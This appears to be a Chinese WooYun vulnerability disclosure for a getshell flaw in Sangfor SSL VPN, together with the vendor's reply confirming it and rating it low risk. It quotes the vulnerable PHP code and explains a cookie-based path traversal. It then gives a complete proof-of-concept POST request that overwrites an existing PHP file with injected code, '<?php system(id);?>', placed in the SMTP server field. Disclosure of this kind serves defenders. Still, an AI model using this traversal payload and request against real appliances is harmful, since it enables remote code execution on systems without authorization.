当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0195091

漏洞标题:深信服SSL VPN getshell漏洞(有条件限制)

相关厂商:深信服

漏洞作者: 路人甲

提交时间:2016-04-11 18:42

修复时间:2016-07-11 11:00

公开时间:2016-07-11 11:00

漏洞类型:设计不当

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-11: 细节已通知厂商并且等待厂商处理中
2016-04-12: 厂商已经确认,细节仅向厂商公开
2016-04-15: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-06-06: 细节向核心白帽子及相关领域专家公开
2016-06-16: 细节向普通白帽子公开
2016-06-26: 细节向实习白帽子公开
2016-07-11: 细节向公众公开

简要描述:

来一发

详细说明:

这里为了保护厂商知识产权,隐去大部分代码
漏洞利用前提:
1、有登陆SSL VPN控制台的权限
2、可以SSL VPN修改邮件服务器配置
问题出在sysCfgController.class.php 147行(邮件服务器设置的发送测试邮件功能)

public function sendTestMail($SMTPServer, $SMTPPort, $DestAddr, $EmailTitle, $EnableCheckUsr=0, $EmailUser='', $EmailPassword='',$EmailFrom='',$LanguageType='zh_CN')
		{
			// 写入临时配置文件
			$conf_file = '/tmp/testmail_'.$_COOKIE['sinfor_session_id'];
			$contents  = "[MAIL]\n";
			$contents .= "EnableEmailNotice = \"1\"\n";
			$contents .= "SMTPServer = \"$SMTPServer\"\n";
			$contents .= "SMTPPort = \"$SMTPPort\"\n";
			$contents .= "EnableCheckUsr = \"$EnableCheckUsr\"\n";
			$contents .= "EmailUser = \"$EmailUser\"\n";
			$contents .= "EmailPassword = \"$EmailPassword\"\n";
			$contents .= "EmailFrom = \"$EmailFrom\"\n";
			$contents .= "DestAddr = \"$DestAddr\"\n";
			$contents .= "EmailTitle = \"$EmailTitle\"\n";
			$contents .= "ContentsFile = \"/tmp/smtpsend_test.txt\"\n";
			@file_put_contents($conf_file, $contents);
			if (!file_exists($conf_file))
				throw new FileException($conf_file);


file_put_contents在file_exists前执行,而$conf_file来源于cookie参数sinfor_session_id
那么我们提交的时候修改cookie sinfor_session_id为:

sinfor_session_id=W04EDB7D9DC3B2FAAD4A9DD6C23CE9B2/../../tmp/1.txt


即可在/tmp/目录下创建一个1.txt文件
如何getshell呢?向web根目录下写个php就行了呀
但这里会碰到问题:新建的文件权限是-rw-------,也就是说web容器不能执行新建的文件
为了突破这个问题,需要覆盖掉一个已存在的php文件,利用其x权限来达到getshell的目的
就拿这个php开刀吧:/app/usr/sbin/webui/html/appSsoApi.php
那么将cookie sinfor_session_id修改为:

sinfor_session_id=W04EDB7D9DC3B2FAAD4A9DD6C23CE9B2/../../tmp/../../app/usr/sbin/webui/html/appSsoApi.php


注意!此操作会覆盖上面的php文件
最终POC:

POST /cgi-bin/php-cgi/html/delegatemodule/HttpHandler.php?controler=SysCfg&action=sendTestMail&token=72c791a93959bf388db3af864c09bbee82f2d1a8 
HTTP/1.1
Accept: */*
Accept-Language: zh-CN
Referer: https://***/html/tpl/mailMgt.html
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: ***
Content-Length: 122
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: language=zh_CN; USER_CUSTOM_SETTING=1460011919; SESSID=C42EC5FBB05DCD23B13A3384C98E065DC8271CA9AC1B4F433557BC8C4FBC312; x-anti-csrf-
gcs=72DFC30A00E3FB9E; sinfor_session_id=W04EDB7D9DC3B2FAAD4A9DD6C23CE9B2/../../tmp/../../app/usr/sbin/webui/html/appSsoApi.php; 
PHPSESSID=870a66816ba987171730e9b80753da82; x-act-flag-gcs=; usermrgstate=%7B%22params%22%3A%7B%22grpid%22%3A%2238%22%2C%22recflag%22%3A0%2C
%22filter%22%3A0%7D%2C%22pageparams%22%3A%7B%22start%22%3A0%2C%22limit%22%3A25%7D%2C%22otherparams%22%3A%7B%22searchtype%22%3A0%2C%22recflag
%22%3Afalse%7D%7D; hidecfg=%7B%22name%22%3Afalse%2C%22flag%22%3Afalse%2C%22note%22%3Afalse%2C%22expire%22%3Atrue%2C%22lastlogin_time%22%3Atrue%2C
%22phone%22%3Atrue%2C%22allocateip%22%3Atrue%2C%22other%22%3Afalse%2C%22state%22%3Afalse%7D
SMTPServer=<?php system(id);?>&SMTPPort=1&EmailUser=&EmailPassword=&EmailFrom=1&LanguageType=zh_CN&DestAddr=1&EmailTitle=1


提交后访问https://***/cgi-bin/php-cgi/html/appSsoApi.php,可看到php代码执行:

1.png

漏洞证明:

1.png

修复方案:

你懂的

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:4

确认时间:2016-04-12 10:50

厂商回复:

感谢白帽子提交的问题。经确认,该问题确实存在,但需要获取管理员权限后才能利用,影响较小。
目前该问题已经解决,并将在下个版本进行更新。
感谢白帽子为我们指出问题,请白帽子私信留下联系方式,我们将为您寄送礼物以示答谢!

最新状态:

暂无